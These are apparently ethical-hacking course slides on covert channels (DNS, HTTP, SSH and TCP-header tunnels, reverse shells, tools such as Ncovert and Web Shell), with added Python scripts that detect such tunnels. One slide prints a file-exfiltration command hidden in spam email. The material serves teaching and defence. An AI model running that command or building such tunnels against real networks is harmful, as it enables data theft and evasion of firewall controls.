CEHv6 Module 27 Covert Hacking

Ethical Hacking Version 5

Module 24

Covert Hacking

EC-Council

Insider Attacks

• Insider attacks are attacks initiated from the inside out

• Inside-out attacks try to initiate network connections from the trusted (corporate) network to the untrusted (Internet) network

• These techniques are used to evade firewall filters

[Diagram: Insider / Outsider]

What is a Covert Channel?

• A covert channel is a mechanism for sending and receiving information between machines without alerting any firewalls and IDSs on the network

• The technique derives its stealthy nature from the fact that it sends traffic through ports that most firewalls will permit

[Diagram: Network, Firewall, Internet, Attacker]

Security Breach

• A covert channel is a security breach because it involves a trusted insider sending information to an unauthorized outsider in a covert fashion

• For example, an employee wants to let an outsider know whether his company won a big contract

• The two could come up with a scheme to communicate this information secretly

Why Do You Want to Use a Covert Channel?

• Transfer a file from a victim machine to a hacker machine

• Transfer a file from a hacker machine to a victim machine

• Launch applications on the victim machine

• Interactive remote-control access from the hacker machine to the victim machine

• Bypass any corporate firewall filtering rules

• Bypass corporate proxy server content filters

Motivation for a Firewall Bypass

• Surfing to filtered websites (e.g. www.certifiedhacker.com)

• Listening to Internet radio

• Chatting with Internet friends

• Administration of home web servers via SSH

• Uploading and downloading special files (EXE, ZIP) which are filtered by the corporate content filter policy

• Using peer-to-peer techniques

• Who wants to bypass the firewall policy?

  • Advanced users from the internal network

  • Disgruntled employees

  • Hackers

Covert Channels Scope

Covert Channel: Attack Techniques

1. Implementing hacker code within the optional fields of an Internet-allowed protocol

   • DNS tunnel, ICMP tunnel

2. Tunneling the hacker payload within the request and response of an Internet-allowed protocol

   • HTTP tunnel, e-mail tunnel

3. Running other protocols on ports other than those normally assigned to them

   • For example, running IRC on port 80 (HTTP)

4. Misusing Internet-allowed protocols

   • Proxy CONNECT method
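The third technique (a protocol running on a port it is not assigned to) is detectable on the defender's side by looking at the first bytes of each session instead of trusting the port number. The following Python script is an added illustration written for this page, not a tool from the module: it classifies a session by payload signature and flags sessions whose classification disagrees with the port. The signature patterns, the port-to-protocol table and the sample sessions are assumptions constructed for the example.

```python
"""Flag TCP sessions whose first client payload does not match the protocol
normally expected on the destination port (e.g. IRC on port 80).

Added example for this page, not a tool from the module. Signatures, the
port table and the sample sessions are constructed assumptions.
"""
import re

# Byte-level signatures for the first client payload of a session.
SIGNATURES = {
    "http": re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|CONNECT) \S+ HTTP/1\.[01]\r\n"),
    "tls": re.compile(rb"^\x16\x03[\x00-\x03]"),          # TLS handshake record header
    "ssh": re.compile(rb"^SSH-2\.0-"),
    "irc": re.compile(rb"^(NICK|USER|PASS|CAP) ", re.IGNORECASE),
    "smtp_client": re.compile(rb"^(EHLO|HELO) ", re.IGNORECASE),
}

# Which protocol each "Internet-allowed" port is supposed to carry.
EXPECTED = {80: "http", 443: "tls", 22: "ssh", 25: "smtp_client", 6667: "irc"}


def classify(payload: bytes) -> str:
    """Name the protocol the first payload bytes look like, or 'unknown'."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(payload):
            return name
    return "unknown"


def check_session(dst_port: int, first_payload: bytes) -> dict:
    """Compare what the port promises with what the bytes show."""
    seen = classify(first_payload)
    expected = EXPECTED.get(dst_port)
    # A port with no expectation (e.g. 8080) is never a mismatch; an expected
    # port carrying something unrecognised is reported conservatively.
    mismatch = expected is not None and seen != expected
    return {"port": dst_port, "expected": expected, "seen": seen, "mismatch": mismatch}


def find_mismatches(sessions):
    """Return the check results for every session that mismatches its port."""
    return [r for r in (check_session(p, b) for p, b in sessions) if r["mismatch"]]


# Constructed sample sessions: (destination port, first client bytes)
SAMPLE_SESSIONS = [
    (80, b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    (443, b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),
    (80, b"NICK covert\r\nUSER covert 0 * :covert\r\n"),   # IRC on port 80
    (443, b"SSH-2.0-OpenSSH_8.9\r\n"),                       # SSH on port 443
    (8080, b"anything"),                                     # no expectation
]

if __name__ == "__main__":
    for hit in find_mismatches(SAMPLE_SESSIONS):
        print(f"port {hit['port']}: expected {hit['expected']}, saw {hit['seen']}")
```

The same check cannot see inside a TLS session on 443, which is why the HTTP/S tunnels described later are harder to spot at the firewall; note also that an expected port carrying an unrecognised payload is reported, so a site that legitimately runs something unusual on port 80 needs its own signature added.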

Simple Covert Attacks

• Simple covert attacks use direct channels to communicate with the Internet

• Direct channels:

  • ACK tunnel

  • TCP tunnel (POP, Telnet, SSH)

  • UDP tunnel (syslog, SNMP)

  • ICMP tunnel

  • IPsec, PPTP

[Diagram (Simple Covert Attacks): Corporate Network, Firewall, Internet, Attacker]

Advanced Covert Attacks

• Advanced covert attacks use proxified channels to communicate on the Internet

• Proxified channels:

  • SOCKS SSL tunnel

  • HTTP/S tunnel (the HTTP payload is the tunnel)

  • HTTP/S proxy CONNECT method tunnel

  • DNS tunnel

  • FTP tunnel

  • Mail tunnel

[Diagram (Advanced Covert Attacks): Corporate Network, LAN Proxy, DMZ Proxy, Internet, Attacker]
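Proxified channels leave their traces in the proxy log rather than at the firewall. The script below is an added example for this page (not from the module or from any tool it names) that reviews proxy log entries for two of the channels listed: CONNECT tunnels to ports other than 443, to raw IP addresses, or held open for hours, and HTTP POST tunnels, which show up as many POSTs to one host where the client mostly uploads. The log format, the thresholds and the log lines are constructed assumptions.

```python
"""Review HTTP proxy log entries for signs of proxified covert channels:
CONNECT-method tunnels and HTTP POST tunnels.

Added example, not code from the module or from any tool it lists. The log
format, thresholds and log lines are constructed assumptions.
Assumed line format (space separated):
  <epoch> <client_ip> <method> <target> <status> <bytes_to_client> <bytes_from_client> <seconds>
"""
import ipaddress
from collections import defaultdict

ALLOWED_CONNECT_PORTS = {443}        # CONNECT is normally only needed for HTTPS
LONG_SESSION_SECONDS = 3600          # a CONNECT held open for an hour looks like a tunnel
POST_COUNT_PER_HOST = 50             # many POSTs to one host from one client ...
POST_UPLOAD_RATIO = 5.0              # ... where the client mostly uploads


def parse_line(line):
    ts, client, method, target, status, to_client, from_client, secs = line.split()
    return {"ts": int(ts), "client": client, "method": method, "target": target,
            "status": int(status), "to_client": int(to_client),
            "from_client": int(from_client), "seconds": float(secs)}


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def connect_findings(entry):
    """Reasons a single CONNECT request deserves attention (empty if none)."""
    host, _, port = entry["target"].rpartition(":")
    port = int(port)
    findings = []
    if port not in ALLOWED_CONNECT_PORTS:
        findings.append(f"CONNECT to non-standard port {port}")
    if is_ip_literal(host):
        findings.append("CONNECT to an IP literal instead of a hostname")
    if entry["seconds"] >= LONG_SESSION_SECONDS:
        findings.append(f"CONNECT held open for {entry['seconds']:.0f}s")
    return findings


def analyse(lines):
    """Return a list of (client, target, reason) alerts for the given log lines."""
    alerts = []
    posts = defaultdict(lambda: {"count": 0, "up": 0, "down": 0})
    for line in lines:
        e = parse_line(line)
        if e["method"] == "CONNECT":
            for reason in connect_findings(e):
                alerts.append((e["client"], e["target"], reason))
        elif e["method"] == "POST":
            host = e["target"].split("/")[2]          # http://host/path -> host
            agg = posts[(e["client"], host)]
            agg["count"] += 1
            agg["up"] += e["from_client"]
            agg["down"] += e["to_client"]
    # A POST tunnel carries the client's outbound data; ordinary browsing mostly downloads.
    for (client, host), agg in posts.items():
        ratio = agg["up"] / max(agg["down"], 1)
        if agg["count"] >= POST_COUNT_PER_HOST and ratio >= POST_UPLOAD_RATIO:
            alerts.append((client, host,
                           f"{agg['count']} POSTs with upload/download ratio {ratio:.1f}"))
    return alerts


# Constructed log lines: normal browsing, one suspicious CONNECT, and a POST tunnel.
SAMPLE_LOG = [
    "1700000000 10.1.2.3 GET http://www.example.test/ 200 15000 400 0.2",
    "1700000001 10.1.2.3 CONNECT mail.example.test:443 200 50000 8000 12.5",
    "1700000002 10.1.2.9 CONNECT 203.0.113.7:22 200 1200 900 5400.0",
] + [f"{1700000100 + i} 10.1.2.5 POST http://cdn.example.test/up 200 200 4096 0.3"
     for i in range(60)]

if __name__ == "__main__":
    for client, target, reason in analyse(SAMPLE_LOG):
        print(f"{client} -> {target}: {reason}")
```

Restricting CONNECT to port 443 at the proxy removes the first class of finding outright; the POST heuristic is only a starting point for a look at the destination, since a legitimate backup or file-sharing service produces the same ratio.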

Standard Direct Connection

[Diagram: Attacker connects to Victim Server]

Reverse Shell (Reverse Telnet)

[Diagram: Victim Server connects back to Attacker]

Direct Attack Example

[Diagram: Internal Network, Hacker-controlled host]

• Buffer overflow is an example of a direct attack

• Web server request passed by the firewall

• Reverse shell is established

In-Direct Attack Example

[Diagram: Internal Network, INSIDER, Hacker-controlled host; port blocked by firewall]

• Remote control indirect attack

• Web server request BLOCKED by the firewall

• Reverse shell is established

Reverse Connecting Agents

• Reverse connecting agents can be installed by:

  • E-mail (attachments, HTML social engineering)

  • Download from the Web

  • CD-ROM autostart program

  • ZIP drives

  • USB stick

  • iPod drives

Covert Channel Attack Tools

• Netcat

• DNS tunnel

• SSH reverse tunnel

• HTTP/S tunnel

• HTTPS proxy CONNECT method tunnel

• ICMP tunnel

Netcat

• Netcat is the most popular tool for reverse shell exploits

• Widely used as the payload in buffer overflows

DNS Tunneling

• The data is tunneled through DNS traffic

• How it works: the client does DNS lookups for a host in the delegated domain. If the server wants to connect, it responds with a 'key' IP address. The client then starts a shell in a pipe and feeds the output of the shell (in the form of DNS queries) to the server.

[Diagram: DNS tunneling]

Covert Channel Using DNS Tunneling

[Diagram: the Client polls the Server (Poll, Poll, Poll); the Server returns Commands; the Client executes them]

1. POLL

2. GET FILE TO CLIENT

3. PUT FILE TO SERVER

4. EXECUTE @CLIENT

5. EXIT CLIENT

DNS Tunnel Client

• The DNS Tunnel Client is a tool that uses DNS queries to build up a tunnel to the DNS Tunnel Server, which is located on the Internet

• When the tunnel is established successfully, the client computer can be remotely controlled through the web site of the DNS Tunnel Server

DNS Tunneling Countermeasures

• Separate internal from external DNS

• Apply firewall rule: allow DNS from internal HTTP proxy servers only

• Apply firewall rule: deny all other DNS packets
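The countermeasures above restrict which hosts may talk DNS to the Internet; they do not by themselves tell you whether a tunnel is already running through the permitted resolver. The following Python script is an added example written for this page (not EC-Council's code or that of any DNS tunnel tool): it checks outbound query logs against the "allowed DNS sources" policy and scores each domain on the properties a tunnel cannot avoid, namely long, high-entropy, never-repeated labels and unusual record types. The log format, thresholds, addresses and sample queries are constructed assumptions.

```python
"""Heuristic detection of DNS tunneling in outbound DNS query logs, plus the
policy check from the countermeasures (only the internal proxy/resolver may
send DNS to the Internet).

Added example for this module, not EC-Council's or any tool's code. The log
format, thresholds, addresses and sample lines are constructed assumptions.
Assumed line format: <epoch> <source_ip> <qtype> <qname>
"""
import hashlib
import math
from collections import Counter, defaultdict

ALLOWED_DNS_SOURCES = {"10.0.0.53"}   # the internal resolver/proxy (assumed address)
MIN_QUERIES = 20                      # queries per domain before it is scored
MAX_MEAN_ENTROPY = 3.3                # bits per character; real hostnames average well below this
MAX_MEAN_SUBLEN = 40                  # average length of the part below the registered domain
MIN_UNIQUE_RATIO = 0.8                # tunnels never repeat a query name, or a cache would answer it
RARE_QTYPES = {"TXT", "NULL", "CNAME"}
MAX_RARE_FRACTION = 0.5


def shannon_entropy(s):
    """Bits per character of the string's empirical symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Return (registered domain, subdomain) using a two-label approximation;
    a real deployment would use the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def analyse(lines):
    """Return (policy_alerts, tunnel_alerts) for the given log lines."""
    policy_alerts = []
    per_domain = defaultdict(list)
    for line in lines:
        _, src, qtype, qname = line.split()
        if src not in ALLOWED_DNS_SOURCES:           # firewall rule: deny all other DNS
            policy_alerts.append((src, qname))
        domain, sub = split_name(qname)
        per_domain[domain].append((sub, qtype))

    tunnel_alerts = []
    for domain, entries in per_domain.items():
        if len(entries) < MIN_QUERIES:
            continue
        subs = [s for s, _ in entries]
        mean_entropy = sum(shannon_entropy(s) for s in subs) / len(subs)
        mean_len = sum(len(s) for s in subs) / len(subs)
        unique_ratio = len(set(subs)) / len(subs)
        rare = sum(1 for _, t in entries if t in RARE_QTYPES) / len(entries)
        reasons = []
        if mean_entropy > MAX_MEAN_ENTROPY:
            reasons.append(f"mean label entropy {mean_entropy:.2f}")
        if mean_len > MAX_MEAN_SUBLEN:
            reasons.append(f"mean subdomain length {mean_len:.0f}")
        if unique_ratio > MIN_UNIQUE_RATIO:
            reasons.append(f"{unique_ratio:.0%} of names never repeat")
        if rare > MAX_RARE_FRACTION:
            reasons.append(f"{rare:.0%} rare record types")
        if len(reasons) >= 2:                         # require two independent signals
            tunnel_alerts.append((domain, len(entries), reasons))
    return policy_alerts, tunnel_alerts


def _constructed_log():
    lines = []
    benign = ["www", "mail", "imap", "smtp", "ns1"]
    for i in range(25):                               # ordinary lookups via the resolver
        lines.append(f"{1700000000 + i} 10.0.0.53 A {benign[i % 5]}.example.test")
    for i in range(30):                               # tunnel: unique, high-entropy labels, TXT queries
        payload = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:56]
        lines.append(f"{1700000100 + i} 10.0.0.53 TXT {payload}.t.tunnel.test")
    # two workstations resolving directly, bypassing the resolver (policy violation)
    lines.append("1700000200 10.1.2.7 A www.example.test")
    lines.append("1700000201 10.1.2.8 A www.example.test")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    policy, tunnels = analyse(SAMPLE_LOG)
    for src, name in policy:
        print(f"policy: {src} sent DNS directly ({name})")
    for domain, count, reasons in tunnels:
        print(f"tunnel suspect: {domain} ({count} queries): {'; '.join(reasons)}")
```

Requiring two signals keeps CDN and anti-spam domains, which also produce long but repetitive names, from firing on their own; the policy check is the cheaper and more reliable of the two and is exactly the firewall rule pair above, applied to the log after the fact.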

Covert Channel Using SSH

• Assuming SSH is allowed by the firewall, establish an SSH connection from inside out

• Use this connection to gain access to the internal systems

[Diagram: inside-out SSH connection]

Covert Channel using SSH (Advanced)

• Use SSL if a proxy server is used internally and content filtering is enabled

[Diagram: SSH over SSL through the internal proxy]

HTTP/S Tunneling Attack

• Establish an inside-out connection using an HTTP POST request (port 80 is usually allowed)

[Diagram: Victim on the Corporate LAN, HTTP/S Proxy (content filtering enabled; HTTP, HTTPS, FTP), Internet, Web Server]

1. Data is sent using HTTP + applets

2. SSH is established from the web server to the hacker machine

Covert Channel Hacking Tool: Active Port Forwarder

• Active Port Forwarder is a software tool for secure port forwarding. It uses SSL to increase the security of communication between a server and a client

• This tool can be used to bypass firewalls

Covert Channel Hacking Tool: CCTT

• CCTT (Covert Channel Tunneling Tool) enables the creation of communication channels through NACS to create data streams which can:

  • Establish an external server shell from within the internal network

  • Establish a shell from a box located within the internal network to an external server

  • Establish a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (SSH, SMTP, POP, etc.) between an external server and a box within the internal network

Covert Channel Hacking Tool: Firepass

• Firepass is a tunneling tool that allows bypassing firewall restrictions by encapsulating data flows inside legitimate ones using HTTP POST requests

• TCP- or UDP-based protocols may be tunneled with Firepass

Covert Channel Hacking Tool: MsnShell

• MsnShell is a covert channel tunneling tool that allows you to remotely control a Linux computer protected by a firewall

• MsnShell encapsulates shell commands and responses within the MSN protocol:

  • Establishes a shell from a box located within the internal network to an external server

  • Encapsulates shell commands and responses within the MSN protocol (SHELL over MSN)

  • Supports HTTP proxy (SHELL over MSN over HTTP)

Covert Channel Hacking Tool: Web Shell

• "Web Shell" is a remote UNIX/Windows shell that tunnels packets via HTTP/HTTPS

• The client component provides a shell-like prompt, encapsulating user commands into HTTP POST requests and sending them to the server-part script on the target web server, directly or via an HTTP proxy server

• The server part extracts and executes commands from the HTTP POST requests and returns STDOUT and STDERR output as HTTP response messages

  • SSL support

  • Command-line history support

  • File upload/download

Covert Channel Hacking Tool: NCovert

• Ncovert is an open-source program designed to function as a TCP covert channel

• It is a file transfer system that uses the TCP protocol to covertly move data from one system to another

• Ncovert uses spoofing techniques to hide the source of the communication and the data that travels over the network

• The technique creates a covert channel by hiding four characters of data in the TCP header's initial sequence number (ISN) field

Ncovert - How it works

• The sender sends a SYN packet with data in the ISN to a public server, forging the source IP as the receiver's IP

• The public server receives the SYN and sends a SYN/ACK to the receiver's machine

• The receiver's machine sniffs the packet and extracts the data; its OS sends a RST to the public server

• This process is repeated until all data is sent
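The exchange described above gives the defender two things to look for at the network edge: SYN packets leaving the network with a source address that is not the network's own (the forged receiver address, when the sender is inside), and SYN/ACKs arriving at an internal host that never sent the corresponding SYN (when the receiver is inside; its OS answers them with RST). The script below is an added example for this page, not Ncovert's code or output; its packet records are constructed and simplified, and the sample contains one instance of each case.

```python
"""Edge-monitoring checks for an ISN-style reflected covert channel: spoofed
outbound SYNs and unsolicited inbound SYN/ACKs.

Added example for this module, not Ncovert's code. Packet records are
constructed and simplified: (epoch, direction, src, dst, sport, dport, flags)
where direction is "out" (leaving the internal network) or "in".
"""
import ipaddress
from collections import Counter

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")   # assumed internal address range
UNSOLICITED_THRESHOLD = 10                           # SYN/ACKs from one server to one host


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL_NET


def analyse(packets):
    """Return {'spoofed_egress': [...], 'reflected_channels': [(server, host, count)]}."""
    outbound_syns = set()          # (src, dst, sport, dport) of SYNs seen leaving
    unsolicited = Counter()        # (external server, internal host) -> SYN/ACK count
    spoofed_egress = []
    for ts, direction, src, dst, sport, dport, flags in packets:
        if direction == "out":
            if not is_internal(src):               # BCP 38 style egress check
                spoofed_egress.append((ts, src, dst, dport))
            elif flags == "S":
                outbound_syns.add((src, dst, sport, dport))
        elif direction == "in" and flags == "SA":
            # A SYN/ACK is solicited only if the matching SYN went out earlier.
            if (dst, src, dport, sport) not in outbound_syns:
                unsolicited[(src, dst)] += 1
    reflected = [(server, host, n) for (server, host), n in unsolicited.items()
                 if n >= UNSOLICITED_THRESHOLD]
    return {"spoofed_egress": spoofed_egress, "reflected_channels": reflected}


def _constructed_packets():
    pkts = []
    # A normal HTTPS connection: SYN out, SYN/ACK back on the same 4-tuple.
    pkts.append((1700000000, "out", "10.1.2.3", "198.51.100.10", 40000, 443, "S"))
    pkts.append((1700000000, "in", "198.51.100.10", "10.1.2.3", 443, 40000, "SA"))
    # Internal sender forging an external receiver's address (203.0.113.9)
    # on SYNs to a public web server.
    for i in range(12):
        pkts.append((1700000010 + i, "out", "203.0.113.9", "198.51.100.80", 50000 + i, 80, "S"))
    # Internal receiver (10.1.2.77) getting SYN/ACKs it never asked for, then answering RST.
    for i in range(12):
        pkts.append((1700000020 + i, "in", "198.51.100.80", "10.1.2.77", 80, 50000 + i, "SA"))
        pkts.append((1700000020 + i, "out", "10.1.2.77", "198.51.100.80", 50000 + i, 80, "R"))
    return pkts


SAMPLE_PACKETS = _constructed_packets()

if __name__ == "__main__":
    result = analyse(SAMPLE_PACKETS)
    print(f"{len(result['spoofed_egress'])} spoofed outbound packets")
    for server, host, n in result["reflected_channels"]:
        print(f"{n} unsolicited SYN/ACKs from {server} to {host}")
```

Unsolicited SYN/ACKs are also what backscatter from a spoofed-source flood against the public server looks like, so the count is a cue to pull the capture, not a verdict; the egress check is the more robust of the two and is simply anti-spoofing filtering enforced at the firewall, which also stops the first packet of the channel from ever leaving.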

Ncovert2 - How it works - Part 1

1. Sender and receiver agree on a shared secret, which is turned into a SHA-1 hash

2. Sender generates a random session key and creates the IPID and source port from the SHA-1 hash and the session key

3. Sender XORs the file size and the session key to create the ISN

4. The first packet is sent to port 80 with the session key in the IPID and source port, and the file size in the ISN

5. Receiver sniffs for a packet to its destination address with destination port 80

6. Receiver extracts the session key from the IPID and source port using the SHA-1 hash

7. Receiver extracts the file size from the ISN using the session key

8. Sender and receiver generate a session hash from the session key and the SHA-1 password hash for creating predictable source ports

Ncovert2 - How it works - Part 2

9. Sender XORs the data with the previous ISN and the session hash to create a new ISN, creates a packet with a random IP ID, the "predictable" source port, and the new ISN, and sends the packet

10. Sender also sends decoy packets

11. Destination ports on legitimate and decoy packets randomly use 1-65535, repeating as needed

12. Receiver sniffs packets, ignores packets without "predictable" destination ports, and uses the previous ISN and session hash to extract the data

13. Packets are sent until all data is transmitted

14. The source address is only required on the first packet, so source addresses can be changed to something "random", including on decoy packets

15. The transmission should look like a TCP ping to port 80 followed by a full port scan, with random source addresses

Covert Channel Hacking via Spam E-mail Messages

• Covert channel communication via spam messages is difficult to detect because of the means of delivery

• By using keyword- or phrase-based communication with the back door system, the e-mail appears to be ordinary spam

• This text can be varied according to the attacker's specification

• This makes detection via standard intrusion detection methods virtually impossible

• The client and server components can exchange information by simply sending spam e-mail messages

Covert Channel Hacking via Spam E-mail Messages

• Hidden embedded command inside the spam e-mail:

  tftp -I 10.0.0.6 c:\conf\abc.dat send.dat

Hydan

• Hydan steganographically conceals a message in an application without altering the file size

• It exploits redundancy in the i386 instruction set by defining sets of functionally equivalent instructions. It then encodes information in machine code by using the appropriate instruction from each set

• This tool can be used for covert communication

• http://crazyboy.com/hydan